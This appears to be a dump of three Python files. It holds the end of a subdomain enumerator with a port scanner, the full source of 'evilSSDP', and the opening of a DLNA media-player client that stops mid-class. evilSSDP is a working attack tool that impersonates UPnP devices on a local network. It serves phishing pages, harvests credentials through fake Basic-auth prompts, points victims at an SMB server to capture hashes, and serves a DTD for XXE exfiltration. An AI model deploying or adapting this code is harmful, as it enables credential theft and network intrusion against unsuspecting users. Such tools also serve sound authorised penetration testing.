try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
links = json.loads(resp)['subdomains']
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class CrtSearch(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://crt.sh/?q=%25.{domain}'
self.engine_name = "SSL Certificates"
self.q = q
super(CrtSearch, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if resp:
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
link_regx = re.compile('<TD>(.*?)</TD>')
try:
links = link_regx.findall(resp)
for link in links:
link = link.strip()
subdomains = []
if '<BR>' in link:
subdomains = link.split('<BR>')
else:
subdomains.append(link)
for subdomain in subdomains:
if not subdomain.endswith(self.domain) or '*' in subdomain:
continue
if '@' in subdomain:
subdomain = subdomain[subdomain.find('@')+1:]
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
print(e)
pass
class PassiveDNS(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://api.sublist3r.com/search.php?domain={domain}'
self.engine_name = "PassiveDNS"
self.q = q
super(PassiveDNS, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if not resp:
return self.subdomains
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
subdomains = json.loads(resp)
for subdomain in subdomains:
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class portscan():
def __init__(self, subdomains, ports):
self.subdomains = subdomains
self.ports = ports
self.lock = None
def port_scan(self, host, ports):
openports = []
self.lock.acquire()
for port in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
result = s.connect_ex((host, int(port)))
if result == 0:
openports.append(port)
s.close()
except Exception:
pass
self.lock.release()
if len(openports) > 0:
print("%s%s%s - %sFound open ports:%s %s%s%s" % (G, host, W, R, W, Y, ', '.join(openports), W))
def run(self):
self.lock = threading.BoundedSemaphore(value=20)
for subdomain in self.subdomains:
t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
t.start()
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
bruteforce_list = set()
search_list = set()
if is_windows:
subdomains_queue = list()
else:
subdomains_queue = multiprocessing.Manager().list()
# Check Bruteforce Status
if enable_bruteforce or enable_bruteforce is None:
enable_bruteforce = True
# Validate domain
domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
if not domain_check.match(domain):
if not silent:
print(R + "Error: Please enter a valid domain" + W)
return []
if not domain.startswith('http://') or not domain.startswith('https://'):
domain = 'http://' + domain
parsed_domain = urlparse.urlparse(domain)
if not silent:
print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
if verbose and not silent:
print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)
supported_engines = {'baidu': BaiduEnum,
'yahoo': YahooEnum,
'google': GoogleEnum,
'bing': BingEnum,
'ask': AskEnum,
'netcraft': NetcraftEnum,
'dnsdumpster': DNSdumpster,
#'virustotal': Virustotal,
'threatcrowd': ThreatCrowd,
'ssl': CrtSearch,
'passivedns': PassiveDNS
}
chosenEnums = []
if engines is None:
chosenEnums = [
BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
NetcraftEnum, DNSdumpster, ThreatCrowd, # NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
CrtSearch, PassiveDNS
]
else:
engines = engines.split(',')
for engine in engines:
if engine.lower() in supported_engines:
chosenEnums.append(supported_engines[engine.lower()])
# Start the engines enumeration
enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
for enum in enums:
enum.start()
for enum in enums:
enum.join()
subdomains = set(subdomains_queue)
for subdomain in subdomains:
search_list.add(subdomain)
if enable_bruteforce:
if not silent:
print(G + "[-] Starting bruteforce module now using subbrute.." + W)
record_type = False
path_to_file = os.path.dirname(os.path.realpath(__file__))
subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
process_count = threads
output = False
json_output = False
bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)
subdomains = search_list.union(bruteforce_list)
if subdomains:
subdomains = sorted(subdomains, key=subdomain_sorting_key)
if savefile:
write_file(savefile, subdomains)
if not silent:
print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
if ports:
if not silent:
print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
ports = ports.split(',')
pscan = portscan(subdomains, ports)
pscan.run()
elif not silent:
for subdomain in subdomains:
print(G + subdomain + W)
return subdomains
def interactive():
args = parse_args()
domain = args.domain
threads = args.threads
savefile = args.output
ports = args.ports
enable_bruteforce = args.bruteforce
verbose = args.verbose
engines = args.engines
if verbose or verbose is None:
verbose = True
if args.no_color:
no_color()
banner()
res = main(domain, threads, savefile, ports, silent=False, verbose=verbose, enable_bruteforce=enable_bruteforce, engines=engines)
if __name__ == "__main__":
interactive()
|
essdp.py
|
#!/usr/bin/env python3
import sys
if sys.version_info < (3, 0):
print("\nSorry mate, you'll need to use Python 3+ on this one...\n")
sys.exit(1)
from multiprocessing import Process
from string import Template
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from http.server import HTTPServer
from email.utils import formatdate
from time import sleep
from ipaddress import ip_address
import os,re,argparse,socket,struct,time,re,signal,base64;
banner = r'''
___________ .__.__ _________ _________________ __________
\_ _____/__ _|__| | / _____// _____/\______ \\______ \
| __)_\ \/ / | | \_____ \ \_____ \ | | \| ___/
| \\ /| | |__/ \/ \ | ` \ |
/_______ / \_/ |__|____/_______ /_______ //_______ /____|
\/ \/ \/ \/
...by initstring (gitlab.com/initstring)
Additional contributors: Dwight Hohnstein
'''
print(banner)
############################# Global Variable Declarations #############################
class bcolors:
GREEN = '\033[92m'
BLUE = '\033[94m'
ORANGE = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
okBox = bcolors.BLUE + '[*] ' + bcolors.ENDC
noteBox = bcolors.GREEN + '[+] ' + bcolors.ENDC
warnBox = bcolors.ORANGE + '[!] ' + bcolors.ENDC
msearchBox = bcolors.BLUE + '[M-SEARCH] ' + bcolors.ENDC
xmlBox = bcolors.GREEN + '[XML REQUEST] ' + bcolors.ENDC
phishBox = bcolors.RED + '[PHISH HOOKED] ' + bcolors.ENDC
credsBox = bcolors.RED + '[CREDS GIVEN] ' + bcolors.ENDC
xxeBox = bcolors.RED + '[XXE VULN!!!!] ' + bcolors.ENDC
exfilBox = bcolors.RED + '[EXFILTRATION] ' + bcolors.ENDC
parser = argparse.ArgumentParser()
parser.add_argument('interface', type=str, help='Network interface to listen on.', action='store')
parser.add_argument('-p', '--port', type=str, default=8888, help='Port for HTTP server. Defaults to 8888.'
, action='store')
parser.add_argument('-t', '--template', type=str, default='office365', help='Name of a folder in the templates \
directory. Defaults to "office365". This will determine xml and phishing pages used.'
, action='store')
parser.add_argument('-s', '--smb', type=str, help='IP address of your SMB server. Defalts to the \
primary address of the "interface" provided.', action='store')
parser.add_argument('-b', '--basic', default=False, action="store_true", help="Enable base64 authentication for \
templates and write credentials to creds.txt")
parser.add_argument("-r", "--realm", type=str, default="Microsoft Corporation", help="Realm to appear when prompting \
users for authentication via base64 auth.", action="store")
parser.add_argument("-u", "--url", type=str, default="", help="Add javascript to the template to redirect from the \
phishing page to the provided URL.", action="store")
args = parser.parse_args()
charWhitelist = re.compile('[^a-zA-Z0-9 ._-]') # Defining a list of expected characters for a network device
interface = charWhitelist.sub('', args.interface) # Avoiding command injection vulnerabilities
localPort = int(args.port)
templateDir = os.path.dirname(os.path.abspath(__file__)) + '/templates/' + args.template
isAuth = args.basic
realm = args.realm
redirectUrl = args.url
if not os.path.isdir(templateDir):
print(warnBox + "Sorry, that template directory does not exist. Please double-check and try again.")
sys.exit()
############################# End Global Variable Declarations #############################
class SSDPListener:
"""
This class object will bind to the SSDP-spec defined multicast address and port. We can then receive data from
this object, which will be capturing the UDP multicast traffic on a local network. Processing is handled in
the main() function below.
"""
def __init__(self, localIp, localPort):
self.sock = None
self.knownHosts = []
self.localIp = localIp
self.localPort = localPort
ssdpPort = 1900 # This is defined by the SSDP spec, do not change
mcastGroup='239.255.255.250' # This is defined by the SSDP spec, do not change
serverAddress = ('', ssdpPort)
# Create the socket
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
self.sock.bind(serverAddress)
# Tell the operating system to add the socket to
# the multicast group on for the interface on the specific IP.
group = socket.inet_aton(mcastGroup)
mreq = struct.pack('4s4s', group, socket.inet_aton(self.localIp))
self.sock.setsockopt(
socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
mreq)
class MultiThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""
Setting up this definition allows us to serve multiple HTTP requests in parallel.
Without this, a client device may hang the HTTP server, blocking other devices from properly accessing and
parsing the XML files.
"""
pass
def MakeHTTPClass(deviceXML, serviceXML, phishPage, exfilDTD):
"""
The class below is being built inside a function to allow us to easily pass variables to built-in functions.
This will build a multi-threaded HTTP server listening for specific requests for the XML files we are serving.
When used with the 'xxe' template, it will also notify on apps that have potential 0-day XXE vulnerabilities
in their XML parsing engines. If you see that warning, it may be CVE time!
Any requests to the HTTP server other than those defined will be given the phishing page. The phishing page
can optionally request an interactive logon if the "-b / --basic" has been specified.
The phishing page the devices SHOULD be requesting is 'present.html' but we will serve it to all requests,
in case a curious users sees the reference and browses there manually.
"""
class DeviceDescriptor(BaseHTTPRequestHandler):
def do_GET(self):
localIp,localPort = self.server.server_address
if self.path == '/ssdp/device-desc.xml': # Parsed automatically by all SSDP apps
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(deviceXML.encode())
elif self.path == '/ssdp/service-desc.xml': # Not yet implemented
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(serviceXML.encode())
elif self.path == '/ssdp/xxe.html': # Access indicates XXE vulnerability
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write('.'.encode())
elif self.path == '/ssdp/data.dtd': # Used for XXE exploitation
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(exfilDTD.encode())
else:
if isAuth: # If user enables -b/--basic in CLI args
if 'Authorization' not in self.headers: # If creds not given, ask for them
self.process_authentication()
self.wfile.write("Unauthorized.".encode())
elif 'Basic ' in self.headers['Authorization']: # Return phishing page after getting creds
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(phishPage.encode())
else:
self.send_response(500)
self.wfile.write("Something happened.".encode())
else: # Return phishing page for everything else
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(phishPage.encode())
def do_POST(self):
if self.path == '/ssdp/do_login.html': # For phishing templates to POST creds to
self.send_response(301)
self.send_header('Location','http://{}:{}/present.html'.format(localIp, localPort))
self.end_headers()
def process_authentication(self):
"""
Will prompt user for credentials, causing execution to go back to the do_GET funtion for further
processing.
"""
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"{}\"'.format(realm))
self.send_header('Content-type','text/html')
self.end_headers()
def write_log(self, data):
"""
Will append important info to a log file. This includes credentials given via basic auth as well as
XXE vulnerabilities.
"""
with open('logs-essdp.txt', 'a') as logFile:
timeStamp = formatdate(timeval=None, localtime=True, usegmt=False)
logFile.write(timeStamp + ": " + data + "\n")
logFile.close()
def log_message(self, format, *args):
"""
Overwriting the built in function to provide useful feedback inside the text UI.
Providing the 'User Agent' is helpful in understanding the types of devices that are interacting
with evilSSDP.
The most important stuff (credentials submitted and XXE vulns) are logged to a text file in the
working directory.
"""
address = self.address_string()
agent = self.headers['user-agent']
verb = self.command
path = self.path
if 'xml' in self.path:
print(xmlBox + "Host: {}, User-Agent: {}".format(address, agent))
print(" {} {}".format(verb, path))
elif 'xxe.html' in self.path:
data = xxeBox + "Host: {}, User-Agent: {}\n".format(address, agent)
data += " {} {}".format(verb, path)
print(data)
self.write_log(data)
elif 'do_login' in self.path:
contentLength = int(self.headers['Content-Length'])
postBody = self.rfile.read(contentLength)
credentials = postBody.decode('utf-8')
data = credsBox + "HOST: {}, CREDS: {}".format(address, credentials)
print(data)
self.write_log(data)
elif 'data.dtd' in self.path:
data = xxeBox + "Host: {}, User-Agent: {}\n".format(address, agent)
data += " {} {}".format(verb, path)
print(data)
self.write_log(data)
elif 'exfiltrated' in self.path:
data = exfilBox + "Host: {}, User-Agent: {}\n".format(address, agent)
data += " {} {}".format(verb, path)
print(data)
self.write_log(data)
else:
print(phishBox + "Host: {}, User-Agent: {}".format(address, agent))
print(" {} {}".format(verb, path))
if 'Authorization' in self.headers:
basic, encoded = self.headers['Authorization'].split(" ")
plaintext = base64.b64decode(encoded).decode()
data = credsBox + "HOST: {}, CREDS: {}".format(address, plaintext)
print(data)
self.write_log(data)
return DeviceDescriptor
def get_ip():
"""
This function will attempt to automatically get the IP address of the provided interface.
This is used for serving the XML files and also for the SMB pointer, if not specified.
"""
try:
localIp = re.findall(r'inet (?:addr:)?(.*?) ', os.popen('ifconfig ' + interface).read())[0]
except Exception:
print(warnBox + "Could not get network interface info. Please check and try again.")
sys.exit()
return localIp
def set_smb():
"""
This function sets the IP address of the SMB server that will be used in the phishing page.
evilSSDP does not provide an SMB server itself - it only points somewhere. You must host your own SMB
server with something like Impacket.
"""
if args.smb:
if ip_address(args.smb):
smbServer = args.smb
else:
print("Sorry, that is not a valid IP address for your SMB server.")
sys.exit()
else:
smbServer = localIp
return(smbServer)
def process_data(listener, data, address):
"""
This function parses the raw data received on the SSDPListener class object. If the M-SEARCH header is found,
it will look for the specific 'Service Type' (ST) being requested and call the function to reply back, telling
the client that we have the device type they are looking for.
If it can't extract the ST, it will reply back with a generic 'ssdp:all' device type and hope for the best.
The function will log the first time a client does a specific type of M-SEARCH, but after that it will be silent.
This keeps the output more readable, as clients can get chatty.
"""
(remoteIp,remotePort) = address
if 'M-SEARCH' in str(data):
try:
requestedST = re.findall(r'\\r\\nST:(.*?)\\r\\n', str(data))[0].strip()
except:
requestedST = 'ssdp:all'
if (address[0],requestedST) not in listener.knownHosts:
print(msearchBox + "New Host {}, Service Type: {}".format(remoteIp, requestedST))
listener.knownHosts.append((address[0], requestedST))
send_location(listener, address, requestedST)
def send_location(listener, address, requestedST):
"""
This function replies back to clients letting them know where they can access more information about our device.
The key here is the 'LOCATION' header and the 'ST' header.
When a client receives this information back on the port they initiated a discover from, they will go to that
location and parse the XML file.
"""
URL = 'http://{}:{}/ssdp/device-desc.xml'.format(localIp, localPort)
lastSeen = str(time.time())
dateFormat = formatdate(timeval=None, localtime=False, usegmt=True)
reply = 'HTTP/1.1 200 OK\r\n'
reply += 'CACHE-CONTROL: max-age=1800\r\n'
reply += 'DATE: ' + dateFormat + '\r\n'
reply += 'EXT: \r\n'
reply += 'LOCATION: ' + URL + '\r\n'
reply += 'SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1\r\n'
reply += 'ST: {}\r\n'.format(requestedST)
reply += 'USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice\n'
reply += 'BOOTID.UPNP.ORG: 0\r\n'
reply += 'CONFIGID.UPNP.ORG: 1\r\n'
reply += '\r\n\r\n'
reply = bytes(reply, 'utf-8')
listener.sock.sendto(reply, address)
def buildDeviceXML(smbServer):
"""
Builds the device descriptor XML file.
"""
variables = {'localIp': localIp,
'localPort': localPort,
'smbServer': smbServer}
fileIn = open(templateDir + '/device.xml')
template = Template(fileIn.read())
xmlFile = template.substitute(variables)
return xmlFile
def buildServiceXML():
"""
Builds the service descriptor XML file. ***Not yet implemented in evilSSDP***
"""
if 'service.xml' in templateDir:
variables = {'localIp': localIp,
'localPort': localPort}
fileIn = open(templateDir + '/service.xml')
template = Template(fileIn.read())
xmlFile = template.substitute(variables)
else:
xmlFile = '.'
return xmlFile
def buildPhish(smbServer):
"""
Builds the phishing page served when users open up an evil device.
"""
variables = {'smbServer': smbServer,
'redirectUrl': redirectUrl}
fileIn = open(templateDir + '/present.html')
template = Template(fileIn.read())
phishPage = template.substitute(variables)
return phishPage
def buildExfil():
"""
Builds the required page for data exfiltration when used with the xxe-exfil template.
"""
if 'xxe-exfil' in templateDir:
variables = {'localIp': localIp,
'localPort': localPort}
fileIn = open(templateDir + '/data.dtd')
template = Template(fileIn.read())
exfilPage = template.substitute(variables)
else:
exfilPage = '.'
return exfilPage
def serve_html(deviceXML, serviceXML, phishPage, exfilDTD):
"""
Starts the web server for delivering XML files and the phishing page.
"""
HTTPClass = MakeHTTPClass(deviceXML, serviceXML, phishPage, exfilDTD)
MultiThreadedHTTPServer.allow_reuse_address = True
descriptor = MultiThreadedHTTPServer((localIp, localPort), HTTPClass)
descriptor.serve_forever()
def print_details(smbServer):
print("\n\n")
print("########################################")
print(okBox + "EVIL TEMPLATE: {}".format(templateDir))
print(okBox + "MSEARCH LISTENER: {}".format(interface))
print(okBox + "DEVICE DESCRIPTOR: http://{}:{}/ssdp/device-desc.xml".format(localIp, localPort))
print(okBox + "SERVICE DESCRIPTOR: http://{}:{}/ssdp/service-desc.xml".format(localIp, localPort))
print(okBox + "PHISHING PAGE: http://{}:{}/ssdp/present.html".format(localIp, localPort))
if redirectUrl:
print(okBox + "REDIRECT URL: {}".format(redirectUrl))
if isAuth:
print(okBox + "AUTH ENABLED, REALM: {}".format(realm))
if 'xxe-exfil' in templateDir:
print(okBox + "EXFIL PAGE: http://{}:{}/ssdp/data.dtd".format(localIp, localPort))
else:
print(okBox + "SMB POINTER: file://///{}/smb/hash.jpg".format(smbServer))
print("########################################")
print("\n\n")
def listen_msearch():
"""
Starts the listener object, receiving and processing UDP multicasts.
"""
listener = SSDPListener(localIp, localPort)
while True:
data, address = listener.sock.recvfrom(1024)
process_data(listener, data, address)
def main():
global localIp
localIp = get_ip() # Extract IP address of provided interface
smbServer = set_smb() # Choose which IP we will inject into IMG tags for phishing
deviceXML = buildDeviceXML(smbServer) # Build the primary XML file parsed in all instances
serviceXML = buildServiceXML() # Not yet implemented, may be necessary for advanced future templates
phishPage = buildPhish(smbServer) # Build the phishing page displayed to users who click evil devices
exfilDTD = buildExfil() # Used in 0-day XXE detection to resolve exfiltration variables
print_details(smbServer) # Provide details of our configuration on the CLI
try: # Spawn the web server and SSDP server as separate threads
webServer = Process(target=serve_html, args=(deviceXML, serviceXML, phishPage, exfilDTD))
ssdpServer = Process(target=listen_msearch, args=())
webServer.start()
ssdpServer.start()
signal.pause()
except (KeyboardInterrupt, SystemExit): # Allow for a graceful exit when pressing Ctrl-C
print("\n" + warnBox + "Thanks for playing! Stopping threads and exiting...\n")
webServer.terminate()
ssdpServer.terminate()
sleep(3)
sys.exit()
if __name__ == "__main__":
main()
|
dlnap.py
|
#!/usr/bin/python
# @file dlnap.py
# @author cherezov.pavel@gmail.com
# @brief Python over the network media player to playback on DLNA UPnP devices.
# Change log:
# 0.1 initial version.
# 0.2 device renamed to DlnapDevice; DLNAPlayer is disappeared.
# 0.3 debug output is added. Extract location url fixed.
# 0.4 compatible discover mode added.
# 0.5 xml parser introduced for device descriptions
# 0.6 xpath introduced to navigate over xml dictionary
# 0.7 device ip argument introduced
# 0.8 debug output is replaced with standard logging
# 0.9 pause/stop added. Video playback tested on Samsung TV
# 0.10 proxy (draft) is introduced.
# 0.11 sync proxy for py2 and py3 implemented, --proxy-port added
# 0.12 local files can be played as well now via proxy
# 0.13 ssdp protocol version argument added
# 0.14 fixed bug with receiving responses from device
# 0.15 Lot's of fixes and features added thanks @ttopholm and @NicoPy
#
# 1.0 moved from idea version
__version__ = "0.15"
import re
import sys
import time
import signal
import socket
import select
import logging
import traceback
import mimetypes
from contextlib import contextmanager
import os
py3 = sys.version_info[0] == 3
if py3:
from urllib.request import urlopen
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
else:
from urllib2 import urlopen
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import shutil
import threading
SSDP_GROUP = ("239.255.255.250", 1900)
URN_AVTransport = "urn:schemas-upnp-org:service:AVTransport:1"
URN_AVTransport_Fmt = "urn:schemas-upnp-org:service:AVTransport:{}"
URN_RenderingControl = "urn:schemas-upnp-org:service:RenderingControl:1"
URN_RenderingControl_Fmt = "urn:schemas-upnp-org:service:RenderingControl:{}"
SSDP_ALL = "ssdp:all"
# =================================================================================================
# XML to DICT
#
def _get_tag_value(x, i = 0):
""" Get the nearest to 'i' position xml tag name.
x -- xml string
i -- position to start searching tag from
return -- (tag, value) pair.
e.g
<d>
<e>value4</e>
</d>
result is ('d', '<e>value4</e>')
"""
x = x.strip()
value = ''
tag = ''
# skip <? > tag
if x[i:].startswith('<?'):
i += 2
while i < len(x) and x[i] != '<':
i += 1
# check for empty tag like '</tag>'
if x[i:].startswith('</'):
i += 2
in_attr = False
while i < len(x) and x[i] != '>':
if x[i] == ' ':
in_attr = True
if not in_attr:
tag += x[i]
i += 1
return (tag.strip(), '', x[i+1:])
# not an xml, treat like a value
if not x[i:].startswith('<'):
return ('', x[i:], '')
i += 1 # <
# read first open tag
in_attr = False
while i < len(x) and x[i] != '>':
# get rid of attributes
if x[i] == ' ':
in_attr = True
if not in_attr:
tag += x[i]
i += 1
i += 1 # >
# replace self-closing <tag/> by <tag>None</tag>
empty_elmt = '<' + tag + ' />'
closed_elmt = '<' + tag + '>None</'+tag+'>'
if x.startswith(empty_elmt):
x = x.replace(empty_elmt, closed_elmt)
while i < len(x):
value += x[i]
if x[i] == '>' and value.endswith('</' + tag + '>'):
# Note: will not work with xml like <a> <a></a> </a>
close_tag_len = len(tag) + 2 # />
value = value[:-close_tag_len]
break
i += 1
return (tag.strip(), value[:-1], x[i+1:])
def _xml2dict(s, ignoreUntilXML = False):
""" Convert xml to dictionary.
<?xml version="1.0"?>
<a any_tag="tag value">
<b> <bb>value1</bb> </b>
<b> <bb>value2</bb> </b>
</c>
<d>
<e>value4</e>
</d>
<g>value</g>
</a>
=>
{ 'a':
{
'b': [ {'bb':value1}, {'bb':value2} ],
'c': [],
'd':
{
'e': [value4]
},
'g': [value]
}
}
"""
if ignoreUntilXML:
s = ''.join(re.findall(".*?(<.*)", s, re.M))
d = {}
while s:
tag, value, s = _get_tag_value(s)
value = value.strip()
isXml, dummy, dummy2 = _get_tag_value(value)
if tag not in d:
d[tag] = []
if not isXml:
if not value:
continue
d[tag].append(value.strip())
else:
if tag not in d:
d[tag] = []
d[tag].append(_xml2dict(value))
return d
s = """
hello
this is a bad
strings
<?xml version="1.0"?>
<a any_tag="tag value">
<b><bb>value1</bb></b>
<b><bb>value2</bb> <v>value3</v></b>
</c>
<d>
<e>value4</e>
</d>
<g>value</g>
</a>
"""
def _xpath(d, path):
""" Return value from xml dictionary at path.
d -- xml dictionary
path -- string path like root/device/serviceList/service@serviceType=URN_AVTransport/controlURL
return -- value at path or None if path not found
"""
for p in path.split('/'):
tag_attr = p.split('@')
tag = tag_attr[0]
if tag not in d:
return None
attr = tag_attr[1] if len(tag_attr) > 1 else ''
if attr:
a, aval = attr.split('=')
for s in d[tag]:
if s[a] == [aval]:
d = s
break
else:
d = d[tag][0]
return d
#
# XML to DICT
# =================================================================================================
# PROXY
#
running = False
class DownloadProxy(BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def log_request(self, code='-', size='-'):
pass
def response_success(self):
url = self.path[1:] # replace '/'
if os.path.exists(url):
f = open(url)
content_type = mimetypes.guess_type(url)[0]
else:
f = urlopen(url=url)
if py3:
content_type = f.getheader("Content-Type")
else:
content_type = f.info().getheaders("Content-Type")[0]
self.send_response(200, "ok")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Content-Type")
self.send_header("Content-Type", content_type)
self.end_headers()
def do_OPTIONS(self):
self.response_success()
def do_HEAD(self):
self.response_success()
def do_GET(self):
global running
url = self.path[1:] # replace '/'
content_type = ''
if os.path.exists(url):
f = open(url)
content_type = mimetypes.guess_type(url)[0]
size = os.path.getsize(url)
elif not url or not url.startswith('http'):
self.response_success()
return
else:
f = urlopen(url=url)
try:
if not content_type:
if py3:
content_type = f.getheader("Content-Type")
size = f.getheader("Content-Length")
else:
content_type = f.info().getheaders("Content-Type")[0]
size = f.info().getheaders("Content-Length")[0]
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header("Content-Type", content_type)
self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(url)))
self.send_header("Content-Length", str(size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
finally:
running = False
f.close()
def runProxy(ip = '', port = 8000):
global running
running = True
DownloadProxy.protocol_version = "HTTP/1.0"
httpd = HTTPServer((ip, port), DownloadProxy)
while running:
httpd.handle_request()
#
# PROXY
# =================================================================================================
def _get_port(location):
""" Extract port number from url.
location -- string like http://anyurl:port/whatever/path
return -- port number
"""
port = re.findall('http://.*?:(\d+).*', location)
return int(port[0]) if port else 80
def _get_control_url(xml, urn):
""" Extract AVTransport contol url from device description xml
xml -- device description xml
return -- control url or empty string if wasn't found
"""
return _xpath(xml, 'root/device/serviceList/service@serviceType={}/controlURL'.format(urn))
@contextmanager
def _send_udp(to, packet):
""" Send UDP message to group
to -- (host, port) group to send the packet to
packet -- message to send
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.sendto(packet.encode(), to)
yield sock
sock.close()
def _unescape_xml(xml):
""" Replace escaped xml symbols with real ones.
"""
return xml.replace('<', '<').replace('>', '>').replace('"', '"')
def _send_tcp(to, payload):
""" Send TCP message to group
to -- (host, port) group to send to payload to
payload -- message to send
"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(to)
sock.sendall(payload.encode('utf-8'))
data = sock.recv(2048)
if py3:
data = data.decode('utf-8')
data = _xml2dict(_unescape_xml(data), True)
errorDescription = _xpath(data, 's:Envelope/s:Body/s:Fault/detail/UPnPError/errorDescription')
if errorDescription is not None:
logging.error(errorDescription)
except Exception as e:
data = ''
finally:
sock.close()
return data
def _get_location_url(raw):
""" Extract device description url from discovery response
raw -- raw discovery response
return -- location url string
"""
t = re.findall('\n(?i)location:\s*(.*)\r\s*', raw, re.M)
if len(t) > 0:
return t[0]
return ''
def _get_friendly_name(xml):
""" Extract device name from description xml
xml -- device description xml
return -- device name
"""
name = _xpath(xml, 'root/device/friendlyName')
return name if name is not None else 'Unknown'
def _get_serve_ip(target_ip, target_port=80):
""" Find ip address of network interface used to communicate with target
target-ip -- ip address of target
return -- ip address of interface connected to target
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
my_ip = s.getsockname()[0]
s.close()
return my_ip
class DlnapDevice:
""" Represents DLNA/UPnP device.
"""
def __init__(self, raw, ip):
self.__logger = logging.getLogger(self.__class__.__name__)
self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))
self.ip = ip
self.ssdp_version = 1
self.port = None
self.name = 'Unknown'
self.control_url = None
self.rendering_control_url = None
self.has_av_transport = False
try:
self.__raw = raw.decode('utf-8')
self.location = _get_location_url(self.__raw)
self.__logger.info('location: {}'.format(self.location))
self.port = _get_port(self.location)
self.__logger.info('port: {}'.format(self.port))
raw_desc_xml = urlopen(self.location).read().decode('utf-8')
self.__desc_xml = _xml2dict(raw_desc_xml)
self.__logger.debug('description xml: {}'.format(self.__desc_xml))
self.name = _get_friendly_name(self.__desc_xml)
self.__logger.info(u'friendlyName: {}'.format(self.name))
self.control_url = _get_control_url(self.__desc_xml, URN_AVTransport)
self.__logger.info('control_url: {}'.format(self.control_url))
self.rendering_control_url = _get_control_url(self.__desc_xml, URN_RenderingControl)
self.__logger.info('rendering_control_url: {}'.format(self.rendering_control_url))
self.has_av_transport = self.control_url is not None
self.__logger.info('=> Initialization completed'.format(ip))
except Exception as e:
self.__logger.warning('DlnapDevice (ip = {}) init exception:\n{}'.format(ip, traceback.format_exc()))
def __repr__(self):
return u'{} @ {}'.format(self.name, self.ip)
def __eq__(self, d):
return self.name == d.name and self.ip == d.ip
